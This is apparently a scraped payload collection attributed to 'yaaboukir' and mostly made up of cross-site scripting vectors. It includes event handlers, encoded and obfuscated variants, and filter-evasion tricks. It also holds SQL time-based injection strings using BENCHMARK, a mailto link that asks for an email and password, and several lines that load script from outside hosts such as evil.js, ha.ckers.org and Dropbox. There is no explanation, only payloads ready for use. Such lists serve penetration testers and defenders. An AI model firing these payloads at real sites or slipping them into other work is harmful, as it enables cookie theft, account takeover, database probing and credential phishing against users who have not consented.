?to=support@hace.com?Subject=2H&body=%0D%0A%0D%0AEmail: %0D%0A%0D%0APassword:%0D%0A

'%2bbenchmark(10000000%2csha1(1))%2b' '+or+benchmark(0,md5(1))=' '+or+benchmark(10000000,md5(1))=' BENCHMARK(10000000,SHA1(1)) https://fb.me/7kFH9QAMH %25%32%37-alert(1337)-%25%32%37 javascript://google.com/?%0aalert%28document.cookie%29 flash based xss (externalInterface.call() ) : “\”));alert(/XSS/)}catch(e){}//” "/alert(/XSS/)/"\"/ "/alert(/XSS/)/" \"/alert(/XSS/);// '<\i\m\g \s\r\c=x \o\n\e\r\r\o\r=\a\l\e\r\t(\'X\S\S\')\>' </SCRIPT>'><script>alert(String.fromCharCode(88,83,83))</SCRIPT> \x61\x6c\x65\x72\x74\x28\x31\x29 \x3Cscript>alert(document.cookie)\x3C/script> \x3Cscript\3Ealert(document.cookie)\x3C/script\3E and &lt;script&gt;alert(document.cookie)&lt;/script&gt; <div style="width: expression(alert(/XSS_Jasminder/));"></div> <script <a href="">atob</a>/,alert(document.domain)</script </td> <svg/onload=location=/javas/.source%2B/cript/.source%2Blocation.hash[2]%2B/al/.source%2B/ert()/.source//#+: '"--></style></scRipt><scRipt>alert('Xss by Yassin')</scRipt> <img src=x onerror='alert(/xss/)'> "><svg/onload=alert(00)> "]));alert(1)}catch(e){alert(document.location)}// t" onmouseover=alert(/xss/); a=" "!><iframe/src \/\/onload = prompt("Xssed!") \/ <svg onload="alert(3)// ?"onclick=alert(/media:content/)// <svg onload="alert(3)// "/> <svg/onload=alert(3)// "/> <img src=l onerror=alert(2)// '"/&gt;<img src="l" onerror="alert(/a/)//" "http://www.example.com/exploit509.js < script > alert (1)</ script> data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K# "onmouseenter="confirm(document.domain) %253Cscript%253Ealert(5)%253C%252Fscript%253E <script>alert(5)</script> "><svg/onload=prompt(3);> <javascript:alert(document.cookie);> "><img src=x onerror=alert(123)> "><div/onmouseover='prompt(String.fromCharCode(88,83,83))'> %27);alert(document.cookie)// javascript:prompt(1); test");+alert(String.fromCharCode(88,83,83))// " onmouseover=prompt(932661) bad=" " onmouseover=alert(55)> </script><script>alert(/BigBear/)</script> &quot;&gt;&lt;img src=x onerror=confirm(1);&gt; '>"><script>alert(0);</script> <script>alert(0);</script> <scrIpt>prompt(0);</script> <script/src="http://test.com/evil.js"> <script>delete alert;alert(1)</script> <svg><script/href=//?? /> - IE <script src="https://www.dropbox.com/s/hp796og5p9va7zt/face.js?dl=1"> </script <svg><script/href= /> <script>confirm(0);</script> <iframe src="javascript:alert(2)" <form><isindex formaction="javascript&colon;confirm(1)> <embed/code=//goo.gl/nlX0P? <embed/src=//goo.gl/nlX0P> <object/data=//goo.gl/nlX0P> <isindex action=//goo.gl/nlX0P type=image> <form action=//goo.gl/nlX0P><input type="submit"> <meta http-equiv="refresh" content="0;url=//goo.gl/nlX0P"> <applet code="javascript:confirm(document.cookie);"> <iframe/src="data:text/html,<iframe/src=http://jsfiddle.net/d7Xu7/1/>"> <isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1) type=image> <isindex x="javascript:" onmouseover="alert(1)"> "><p id="\u0070rompt(1)"onmouseover=\u0065val(id) // "><a fooooooooooooooooooooooooooooooooo href=JaVAScript%26colon%3Bprompt%26lpar%3B1%26rpar%3B%> <img/src="x"/onerror="prom\u0070t&#x28;&#x27;&#x58;&#x53;&#x53;&#x27;&#x29;"> <q oncut=\u0070rompt(2)> "><p id=""onmouseover=\u0070rompt(1) // <a%20x%20href=javascript%26%2358%3Bprompt(1)>a</a> ';alert(String.fromCharCode(88,83,83))//\'; alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//\"; alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT> alert(String.fromCharCode(88,83,83))</SCRIPT> */(URL[%26quot;\142\151\147%26quot;][%26quot;\143\157\156\163\164\162\165\143\164\157\162%26quot;](%26quot;\141\154\145\162\164\75\141\154\145\162\164\50\61\51%26quot;)())'%3E%3C%%20style='x:expression/* 1) <a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button> 2) <div onmouseover='alert&lpar;1&rpar;'>DIV</div> 3) <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> c 4) <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a> 7) <var onmouseover="prompt(1)">On Mouse Over</var>? 8) <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a> 9) <img src="/" =_=" title="onerror='prompt(1)'"> 10) <%<!--'%><script>alert(1);</script --> 11) <script src="data:text/javascript,alert(1)"></script> 12) <iframe/src \/\/onload = prompt(1) 13) <iframe/onreadystatechange=alert(1) 15) <input value=<><iframe/src=javascript:confirm(1) <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC=# onmouseover="alert('xxs')"> <IMG SRC= onmouseover="alert('xxs')"> <IMG onmouseover="alert('xxs')"> <IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img> <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> <<SCRIPT>alert("XSS");//<</SCRIPT>

by yaaboukir

Install 2
works with
  • Twitter

Applet version ID 298761